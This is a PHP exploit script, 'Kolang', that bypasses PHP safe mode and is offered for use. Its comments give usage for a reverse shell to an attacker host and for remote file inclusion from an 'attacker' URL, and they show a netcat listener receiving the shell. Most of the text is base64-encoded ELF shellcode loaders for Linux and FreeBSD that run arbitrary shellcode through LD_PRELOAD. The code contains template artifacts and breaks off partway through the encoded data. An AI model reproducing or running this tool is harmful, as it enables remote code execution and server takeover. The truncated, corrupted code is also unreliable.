|
======================================================
Kolang (proc_open PHP safe mode bypass 4.3.10 - 5.3.0)
======================================================
<?php
/*
Kolang (PHP Safe mode bypass)
(IHSteam priv8 for lazy penetration testers)
(php 4.3.10 - 5.3.0)
http://inj3ct0r.com/exploits/7824
1- Kolang can be used directly in file inclusion RFI&LFI vulnerabilities (no upload required)
2- Kolang can execute arbitrary shellcode (just for fans of metasploit )
~~~~ How to use:)
for linux:
kolang.php?os=linux&host=LHOST&port=LPORT
or
kolang.php?os=linux&shell=BASE64_ENCODED_SHELLCODE
for freebsd:
kolang.php?os=freebsd&shell=BASE64_ENCODED_SHELLCODE
file inclusion :
http://host/vul.php?path=http://attacker/kolang.txt?&os=linux&host=LHOST&port=LPORT
http://localhost/kolang.php?host=localhost&port=2121
hamid@bugtraq ~ $ nc -vv -l -p 2121
listening on [any] 2121 ...
connect to [127.0.0.1] from bugtraq [127.0.0.1] 40526
id
uid=65534(nobody) gid=65533(nogroup) groups=65533(nogroup)
Hamid Ebadi
http://www.bugtraq.ir
contact : ebadi~bugtraq~ir
Kolang means pickaxe (the idea came from amnafzar naming convention)
(Separ, Sarand, Alak, Skort)
*/
$port= intval(___FCKpd___0
REQUEST['port']);
$host= ___FCKpd___0
REQUEST['host'];
$os= ___FCKpd___0
REQUEST['os'];
/*
//compile : cc -o shellcode.so -fPIC -shared shellcode.c
//
//<?php
//$data=file_get_contents('shellcode.so');
//file_put_contents('shellcode_base64.txt',$data);
//?>
// "shellcode loader" : load and execute arbitrary shellcode from a file
// Hamid Ebadi
#define O_RDONLY 00 ; fcntl.h
#define SHELLCODE_MAX_SIZE 1024
// change kolang.php and shellcode loader if sys_get_temp_dir()!='/tmp'
#define SHELLCODE_FILENAME "/tmp/.X11-IHSTEAM"
void getuid()
{
unsetenv("LD_PRELOAD"); //not really necessary, we can remove it
int fd;
char shellcode[SHELLCODE_MAX_SIZE];
char filename[]=SHELLCODE_FILENAME ;
// we can also pass the shellcode in program's arguments
if ((fd = open(SHELLCODE_FILENAME,O_RDONLY)) < 0) {
exit(1);
}
if (read(fd,shellcode,SHELLCODE_MAX_SIZE) < 0){
exit(1);
}
(*(void(*)()) shellcode)();
}
*/
if (___FCKpd___0
REQUEST['os']=='freebsd'){
// freebsd shellcode loader (x86)
$shellcode_loader=
"f0VMRgEBAQkAAAAAAAAAAAMAAwABAAAAeAUAADQAAADsCQAAAAAAADQAIAADACgAFwAUAAEAAAAA
AAAAAAAAAAAAAADhBwAA4QcAAAUAAAAAEAAAAQAAAOQHAADkFwAA5BcAAPwAAAAYAQAABgAAAAAQ
AAACAAAA8AcAAPAXAADwFwAAoAAAAKAAAAAGAAAABAAAABEAAAAkAAAAAAAAAB0AAAAeAAAAIgAA
ABUAAAAAAAAAAAAAABoAAAAcAAAAIwAAACEAAAAbAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXAAAAFAAAABYA
AAAZAAAAAAAAAB8AAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJQAAAAAAAAAAwAB
AAAAAABwAQAAAAAAAAMAAgAAAAAAsAMAAAAAAAADAAMAAAAAAGQEAAAAAAAAAwAEAAAAAACUBAAA
AAAAAAMABQAAAAAA1AQAAAAAAAADAAYAAAAAAOgEAAAAAAAAAwAHAAAAAAB4BQAAAAAAAAMACAAA
AAAAJAcAAAAAAAADAAkAAAAAADAHAAAAAAAAAwAKAAAAAADkFwAAAAAAAAMACwAAAAAA7BcAAAAA
AAADAAwAAAAAAPAXAAAAAAAAAwANAAAAAACQGAAAAAAAAAMADgAAAAAAmBgAAAAAAAADAA8AAAAA
AKAYAAAAAAAAAwAQAAAAAACkGAAAAAAAAAMAEQAAAAAA4BgAAAAAAAADABIAAAAAAAAAAAAAAAAA
AwATAIQAAAAAAAAAAAAAABAAAAABAAAA8BcAAAAAAAARAPH/LAAAAAAAAAAAAAAAIAAAAH0AAABU
BgAAnQAAABIACAAgAAAA1AQAAAAAAAASAAYAOwAAAAAAAAAAAAAAIAAAAJcAAAAAAAAAAAAAABAA
AACjAAAA4BgAAAAAAAAQAPH/JgAAACQHAAAAAAAAEgAJAJwAAADgGAAAAAAAABAA8f8KAAAApBgA
AAAAAAARAPH/rwAAAPwYAAAAAAAAEADx/5IAAAAAAAAAAAAAABAAAACNAAAAAAAAAAAAAAAQAAAA
aQAAAAAAAAAAAAAAIAAAAFMAAAAAAAAAAAAAACAAAAAAX0RZTkFNSUMAX0dMT0JBTF9PRkZTRVRf
VEFCTEVfAF9pbml0AF9maW5pAF9fY3hhX2ZpbmFsaXplAF9fZGVyZWdpc3Rlcl9mcmFtZV9pbmZv
AF9fcmVnaXN0ZXJfZnJhbWVfaW5mbwBfSnZfUmVnaXN0ZXJDbGFzc2VzAGdldHVpZAB1bnNldGVu
dgBvcGVuAGV4aXQAcmVhZABfZWRhdGEAX19ic3Nfc3RhcnQAX2VuZADkFwAACAAAAOgXAAAIAAAA
0BgAAAYWAADUGAAABhkAANgYAAAGIgAA3BgAAAYjAACwGAAABxQAALQYAAAHFgAAuBgAAAcZAAC8
GAAABxoAAMAYAAAHIAAAxBgAAAchAADIGAAAByIAAMwYAAAHIwAAg+wM6BQBAADoEwIAAIPEDMMA
AAD/swQAAAD/owgAAAAAAAAA/6MMAAAAaAAAAADp4P////+jEAAAAGgIAAAA6dD/////oxQAAABo
EAAAAOnA/////6MYAAAAaBgAAADpsP////+jHAAAAGggAAAA6aD/////oyAAAABoKAAAAOmQ////
/6MkAAAAaDAAAADpgP////+jKAAAAGg4AAAA6XD///9VieVT6AAAAABbgcMjEwAAUYC7PAAAAAB1
WIuTLAAAAIXSdB+D7Az/s0D////oXv///4PEEOsMkIPABImDRP/////Si4NE////ixCF0nXpi4Mw
AAAAhcB0EoPsDI2DSP///1DoOP///4PEEMaDPAAAAAGLXfzJw5BVieVT6AAAAABbgcOrEgAAUIuD
OAAAAIXAdBmD7AiNg0AAAABQjYNI////UOhH////g8QQi4P8////hcB0HouDNAAAAIXAdBSD7AyN
g/z///9Q6BH///+DxBCJ9otd/MnDkJCQVYnlV1ZTgew8BAAA6AAAAABbgcM/EgAAg+wMjYPW7v//
UOh9/v//g8QQjb24+///jbPh7v///LkSAAAA86SD7AhqAI2D4e7//1Dopf7//4PEEIlF5IN95AB5
CoPsDGoB6H/+//+D7ARoAAQAAI2F2Pv//1D/deToWP7//4PEEIXAeQqD7AxqAehX/v//jYXY+///
/9CNZfRbXl/Jw5CQkFWJ5VZT6AAAAABbgcOmEQAAjYPw////jXD8i0D86wiQg+4E/9CLBoP4/3X0
W17Jw4PsDOhM/v//g8QMwyRGcmVlQlNEOiBzcmMvbGliL2NzdS9pMzg2LWVsZi9jcnRpLlMsdiAx
LjcgMjAwNS8wNS8xOSAwNzozMTowNiBkZnIgRXhwICQATERfUFJFTE9BRAAvdG1wLy5YMTEtSUhT
VEVBTQAkRnJlZUJTRDogc3JjL2xpYi9jc3UvaTM4Ni1lbGYvY3J0bi5TLHYgMS42IDIwMDUvMDUv
MTkgMDc6MzE6MDYgZGZyIEV4cCAkAAAAAOQXAACcGAAAAAAAAAwAAADUBAAADQAAACQHAAAEAAAA
lAAAAAUAAACwAwAABgAAAHABAAAKAAAAtAAAAAsAAAAQAAAAAwAAAKQYAAACAAAAQAAAABQAAAAR
AAAAFwAAAJQEAAARAAAAZAQAABIAAAAwAAAAEwAAAAgAAAD6//9vAgAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/////AAAAAP////8AAAAAAAAAAPAXAAAAAAAAAAAA
AP4EAAAOBQAAHgUAAC4FAAA+BQAATgUAAF4FAABuBQAAAAAAAAAAAAAAAAAAAAAAAABHQ0M6IChH
TlUpIDMuNC42IFtGcmVlQlNEXSAyMDA2MDMwNQAAR0NDOiAoR05VKSAzLjQuNiBbRnJlZUJTRF0g
MjAwNjAzMDUAAEdDQzogKEdOVSkgMy40LjYgW0ZyZWVCU0RdIDIwMDYwMzA1AAAuc3ltdGFiAC5z
dHJ0YWIALnNoc3RydGFiAC5oYXNoAC5keW5zeW0ALmR5bnN0cgAucmVsLmR5bgAucmVsLnBsdAAu
aW5pdAAudGV4dAAuZmluaQAucm9kYXRhAC5kYXRhAC5laF9mcmFtZQAuZHluYW1pYwAuY3RvcnMA
LmR0b3JzAC5qY3IALmdvdAAuYnNzAC5jb21tZW50AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAGwAAAAUAAAACAAAAlAAAAJQAAADcAAAAAgAAAAAAAAAEAAAABAAAACEA
AAALAAAAAgAAAHABAABwAQAAQAIAAAMAAAAUAAAABAAAABAAAAApAAAAAwAAAAIAAACwAwAAsAMA
ALQAAAAAAAAAAAAAAAEAAAAAAAAAMQAAAAkAAAACAAAAZAQAAGQEAAAwAAAAAgAAAAAAAAAEAAAA
CAAAADoAAAAJAAAAAgAAAJQEAACUBAAAQAAAAAIAAAAHAAAABAAAAAgAAABDAAAAAQAAAAYAAADU
BAAA1AQAABEAAAAAAAAAAAAAAAQAAAAAAAAAPgAAAAEAAAAGAAAA6AQAAOgEAACQAAAAAAAAAAAA
AAAEAAAABAAAAEkAAAABAAAABgAAAHgFAAB4BQAArAEAAAAAAAAAAAAABAAAAAAAAABPAAAAAQAA
AAYAAAAkBwAAJAcAAAwAAAAAAAAAAAAAAAQAAAAAAAAAVQAAAAEAAAACAAAAMAcAADAHAACxAAAA
AAAAAAAAAAABAAAAAAAAAF0AAAABAAAAAwAAAOQXAADkBwAACAAAAAAAAAAAAAAABAAAAAAAAABj
AAAAAQAAAAIAAADsFwAA7AcAAAQAAAAAAAAAAAAAAAQAAAAAAAAAbQAAAAYAAAADAAAA8BcAAPAH
AACgAAAAAwAAAAAAAAAEAAAACAAAAHYAAAABAAAAAwAAAJAYAACQCAAACAAAAAAAAAAAAAAABAAA
AAAAAAB9AAAAAQAAAAMAAACYGAAAmAgAAAgAAAAAAAAAAAAAAAQAAAAAAAAAhAAAAAEAAAADAAAA
oBgAAKAIAAAEAAAAAAAAAAAAAAAEAAAAAAAAAIkAAAABAAAAAwAAAKQYAACkCAAAPAAAAAAAAAAA
AAAABAAAAAQAAACOAAAACAAAAAMAAADgGAAA4AgAABwAAAAAAAAAAAAAAAQAAAAAAAAAkwAAAAEA
AAAAAAAAAAAAAOAIAABvAAAAAAAAAAAAAAABAAAAAAAAABEAAAADAAAAAAAAAAAAAABPCQAAnAAA
AAAAAAAAAAAAAQAAAAAAAAABAAAAAgAAAAAAAAAAAAAAhA0AABAEAAAWAAAAMQAAAAQAAAAQAAAA
CQAAAAMAAAAAAAAAAAAAAJQRAAD1AQAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAlAAAAAAAAAADAAEAAAAAAHABAAAAAAAAAwACAAAAAACwAwAAAAAAAAMAAwAAAAAAZAQAAAAA
AAADAAQAAAAAAJQEAAAAAAAAAwAFAAAAAADUBAAAAAAAAAMABgAAAAAA6AQAAAAAAAADAAcAAAAA
AHgFAAAAAAAAAwAIAAAAAAAkBwAAAAAAAAMACQAAAAAAMAcAAAAAAAADAAoAAAAAAOQXAAAAAAAA
AwALAAAAAADsFwAAAAAAAAMADAAAAAAA8BcAAAAAAAADAA0AAAAAAJAYAAAAAAAAAwAOAAAAAACY
GAAAAAAAAAMADwAAAAAAoBgAAAAAAAADABAAAAAAAKQYAAAAAAAAAwARAAAAAADgGAAAAAAAAAMA
EgAAAAAAAAAAAAAAAAADABMAAAAAAAAAAAAAAAAAAwAUAAAAAAAAAAAAAAAAAAMAFQAAAAAAAAAA
AAAAAAADABYAAQAAAAAAAAAAAAAABADx/yIAAAAAAAAAAAAAAAQA8f8xAAAAAAAAAAAAAAAEAPH/
AQAAAAAAAAAAAAAABADx/zwAAAAAAAAAAAAAAAQA8f9HAAAAkBgAAAAAAAABAA4AVQAAAJgYAAAA
AAAAAQAPAGMAAADsFwAAAAAAAAEADAB2AAAAoBgAAAAAAAABABAAgwAAAOgXAAAAAAAAAQALAIcA
AADgGAAAAQAAAAEAEgCTAAAAeAUAAAAAAAACAAgAqQAAAOQYAAAYAAAAAQASALIAAADwBQAAAAAA
AAIACAA8AAAAAAAAAAAAAAAEAPH/vgAAAJQYAAAAAAAAAQAOAMsAAACcGAAAAAAAAAEADwDYAAAA
7BcAAAAAAAABAAwA5gAAAKAYAAAAAAAAAQAQAPIAAAD0BgAAAAAAAAIACAAIAQAAAAAAAAAAAAAE
APH/IgAAAAAAAAAAAAAABADx/zEAAAAAAAAAAAAAAAQA8f8IAQAAAAAAAAAAAAAEAPH/KQEAAAAA
AAAAAAAABADx/zUBAADkFwAAAAAAAAECCwBCAQAAAAAAAAAAAAAQAAAASwEAAPAXAAAAAAAAEQDx
/1QBAAAAAAAAAAAAACAAAABjAQAAVAYAAJ0AAAASAAgAagEAANQEAAAAAAAAEgAGAHABAAAAAAAA
AAAAACAAAACIAQAAAAAAAAAAAAAQAAAAjQEAAOAYAAAAAAAAEADx/5kBAAAkBwAAAAAAABIACQCf
AQAA4BgAAAAAAAAQAPH/pgEAAKQYAAAAAAAAEQDx/7wBAAD8GAAAAAAAABAA8f/BAQAAAAAAAAAA
AAAQAAAAxgEAAAAAAAAAAAAAEAAAAMsBAAAAAAAAAAAAACAAAADfAQAAAAAAAAAAAAAgAAAAAC91
c3Ivc3JjL2xpYi9jc3UvaTM4Ni1lbGYvY3J0aS5TADxjb21tYW5kIGxpbmU+ADxidWlsdC1pbj4A
Y3J0c3R1ZmYuYwBfX0NUT1JfTElTVF9fAF9fRFRPUl9MSVNUX18AX19FSF9GUkFNRV9CRUdJTl9f
AF9fSkNSX0xJU1RfXwBwLjAAY29tcGxldGVkLjEAX19kb19nbG9iYWxfZHRvcnNfYXV4AG9iamVj
dC4yAGZyYW1lX2R1bW15AF9fQ1RPUl9FTkRfXwBfX0RUT1JfRU5EX18AX19GUkFNRV9FTkRfXwBf
X0pDUl9FTkRfXwBfX2RvX2dsb2JhbF9jdG9yc19hdXgAL3Vzci9zcmMvbGliL2NzdS9pMzg2LWVs
Zi9jcnRuLlMAc2hlbGxjb2RlLmMAX19kc29faGFuZGxlAHVuc2V0ZW52AF9EWU5BTUlDAF9fY3hh
X2ZpbmFsaXplAGdldHVpZABfaW5pdABfX2RlcmVnaXN0ZXJfZnJhbWVfaW5mbwByZWFkAF9fYnNz
X3N0YXJ0AF9maW5pAF9lZGF0YQBfR0xPQkFMX09GRlNFVF9UQUJMRV8AX2VuZABleGl0AG9wZW4A
X0p2X1JlZ2lzdGVyQ2xhc3NlcwBfX3JlZ2lzdGVyX2ZyYW1lX2luZm8A";
}else{
// default: linux
// linux shellcode loader (x86)
$shellcode_loader=
"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
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/////wAAAAD/////AAAAAAAAAAABAAAA
XgAAAAwAAACQAwAADQAAAAgGAAAEAAAA9AAAAPX+/29AAQAABQAAAFwCAAAGAAAAfAEAAAoAAACW
AAAACwAAABAAAAADAAAA9B8AAAIAAAAwAAAAFAAAABEAAAAXAAAAYAMAABEAAABAAwAAEgAAACAA
AAATAAAACAAAAP7//28QAwAA////bwEAAADw//9v8gIAAPr//28BAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAfAAAAAAAAAAAAAL4DAADOAwAA
3gMAAO4DAAD+AwAADgQAABggAAAAR0NDOiAoR2VudG9vIDQuMy4xLXIxIHAxLjEpIDQuMy4xAABH
Q0M6IChHZW50b28gNC4zLjIgcDEuMSkgNC4zLjIAAEdDQzogKEdlbnRvbyA0LjMuMiBwMS4xKSA0
LjMuMgAAR0NDOiAoR2VudG9vIDQuMy4yIHAxLjEpIDQuMy4yAABHQ0M6IChHZW50b28gNC4zLjEt
cjEgcDEuMSkgNC4zLjEAAC5zeW10YWIALnN0cnRhYgAuc2hzdHJ0YWIALmdudS5oYXNoAC5keW5z
eW0ALmR5bnN0cgAuZ251LnZlcnNpb24ALmdudS52ZXJzaW9uX3IALnJlbC5keW4ALnJlbC5wbHQA
LmluaXQALnRleHQALmZpbmkALnJvZGF0YQAuZWhfZnJhbWUALmN0b3JzAC5kdG9ycwAuamNyAC5k
eW5hbWljAC5nb3QALmdvdC5wbHQALmRhdGEALmJzcwAuY29tbWVudAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB8AAAAFAAAAAgAAAPQAAAD0AAAATAAAAAMAAAAAAAAA
BAAAAAQAAAAbAAAA9v//bwIAAABAAQAAQAEAADwAAAADAAAAAAAAAAQAAAAEAAAAJQAAAAsAAAAC
AAAAfAEAAHwBAADgAAAABAAAAAEAAAAEAAAAEAAAAC0AAAADAAAAAgAAAFwCAABcAgAAlgAAAAAA
AAAAAAAAAQAAAAAAAAA1AAAA////bwIAAADyAgAA8gIAABwAAAADAAAAAAAAAAIAAAACAAAAQgAA
AP7//28CAAAAEAMAABADAAAwAAAABAAAAAEAAAAEAAAAAAAAAFEAAAAJAAAAAgAAAEADAABAAwAA
IAAAAAMAAAAAAAAABAAAAAgAAABaAAAACQAAAAIAAABgAwAAYAMAADAAAAADAAAACgAAAAQAAAAI
AAAAYwAAAAEAAAAGAAAAkAMAAJADAAAXAAAAAAAAAAAAAAAEAAAAAAAAAF4AAAABAAAABgAAAKgD
AACoAwAAcAAAAAAAAAAAAAAABAAAAAQAAABpAAAAAQAAAAYAAAAgBAAAIAQAAOgBAAAAAAAAAAAA
ABAAAAAAAAAAbwAAAAEAAAAGAAAACAYAAAgGAAAcAAAAAAAAAAAAAAAEAAAAAAAAAHUAAAABAAAA
AgAAACQGAAAkBgAAHQAAAAAAAAAAAAAAAQAAAAAAAAB9AAAAAQAAAAIAAABEBgAARAYAAAQAAAAA
AAAAAAAAAAQAAAAAAAAAhwAAAAEAAAADAAAADB8AAAwPAAAIAAAAAAAAAAAAAAAEAAAAAAAAAI4A
AAABAAAAAwAAABQfAAAUDwAACAAAAAAAAAAAAAAABAAAAAAAAACVAAAAAQAAAAMAAAAcHwAAHA8A
AAQAAAAAAAAAAAAAAAQAAAAAAAAAmgAAAAYAAAADAAAAIB8AACAPAADIAAAABAAAAAAAAAAEAAAA
CAAAAKMAAAABAAAAAwAAAOgfAADoDwAADAAAAAAAAAAAAAAABAAAAAQAAACoAAAAAQAAAAMAAAD0
HwAA9A8AACQAAAAAAAAAAAAAAAQAAAAEAAAAsQAAAAEAAAADAAAAGCAAABgQAAAEAAAAAAAAAAAA
AAAEAAAAAAAAALcAAAAIAAAAAwAAABwgAAAcEAAACAAAAAAAAAAAAAAABAAAAAAAAAC8AAAAAQAA
AAAAAAAAAAAAHBAAAKYAAAAAAAAAAAAAAAEAAAAAAAAAEQAAAAMAAAAAAAAAAAAAAMIQAADFAAAA
AAAAAAAAAAABAAAAAAAAAAEAAAACAAAAAAAAAAAAAADAFQAAsAIAABoAAAAeAAAABAAAABAAAAAJ
AAAAAwAAAAAAAAAAAAAAcBgAAAsBAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAD0AAAAAAAAAAMAAQAAAAAAQAEAAAAAAAADAAIAAAAAAHwBAAAAAAAAAwADAAAAAABcAgAAAAAA
